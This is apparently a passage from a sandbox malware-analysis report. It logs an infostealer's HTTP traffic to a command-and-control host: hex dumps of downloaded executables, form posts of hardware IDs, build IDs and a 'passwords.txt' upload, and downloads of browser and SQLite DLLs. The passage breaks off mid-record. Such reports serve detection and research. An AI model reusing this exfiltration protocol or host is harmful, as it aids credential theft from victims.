Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:37 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:45 GMTContent-Type: application/octet-streamContent-Length: 551424Last-Modified: Mon, 07 Oct 2024 16:21:33 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "67040a8d-86a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 89 39 06 79 e8 57 55 79 e8 57 55 79 e8 57 55 aa 9a 54 54 75 e8 57 55 aa 9a 52 54 d2 e8 57 55 aa 9a 53 54 6c e8 57 55 aa 9a 56 54 7a e8 57 55 79 e8 56 55 21 e8 57 55 69 6c 54 54 6d e8 57 55 69 6c 53 54 6b e8 57 55 69 6c 52 54 34 e8 57 55 31 6d 5e 54 78 e8 57 55 31 6d a8 55 78 e8 57 55 31 6d 55 54 78 e8 57 55 52 69 63 68 79 e8 57 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8d 0a 04 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 29 00 12 02 00 00 62 06 00 00 00 00 00 52 6f 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 71 34 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 c6 02 00 28 00 00 00 00 80 08 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 08 00 d4 1a 00 00 c0 ab 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ab 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 10 02 00 00 10 00 00 00 12 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 9d 00 00 00 30 02 00 00 9e 00 00 00 16 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 a3 05 00 00 d0 02 00 00 96 05 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 03 00 00 00 80 08 00 00 04 00 00 00 4a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 1a 00 00 00 90 08 00 00 1c 00 00 00 4e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECBFIDGDAKFHIEHJKFHost: lade.petperfectcare.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 31 33 38 44 39 44 41 42 35 30 44 32 38 36 35 38 36 36 33 30 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="hwid"5138D9DAB50D2865866309-a33c7340-61ca------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------FIECBFIDGDAKFHIEHJKF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJKHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 2d 2d 0d 0a Data Ascii: ------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="mode"1------EGCBAFCFIJJJECBGIIJK--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKECAFIDAFIECBKEHDHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="mode"2------JEBKECAFIDAFIECBKEHD--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: lade.petperfectcare.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 2d 2d 0d 0a Data Ascii: ------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="mode"21------GIIEGHIDBGHIECAAECGD--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIHost: lade.petperfectcare.comContent-Length: 5289Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: lade.petperfectcare.comContent-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: lade.petperfectcare.comContent-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: lade.petperfectcare.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="file_data"------DAKEBAKFHCFHIEBFBAFB--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEGDBGDBFIJKECBAKFBHost: lade.petperfectcare.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 2d 2d 0d 0a Data Ascii: ------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="file_data"------IJEGDBGDBFIJKECBAKFB--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBGHost: lade.petperfectcare.comContent-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKFHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 2d 2d 0d 0a Data Ascii: ------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="mode"3------GCBGCAFIIECBFIDHIJKF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBFHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="mode"4------KFHJJJKKFHIDAAKFBFBF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCGIJDHDGDBGDGCGCFHHost: lade.petperfectcare.comContent-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 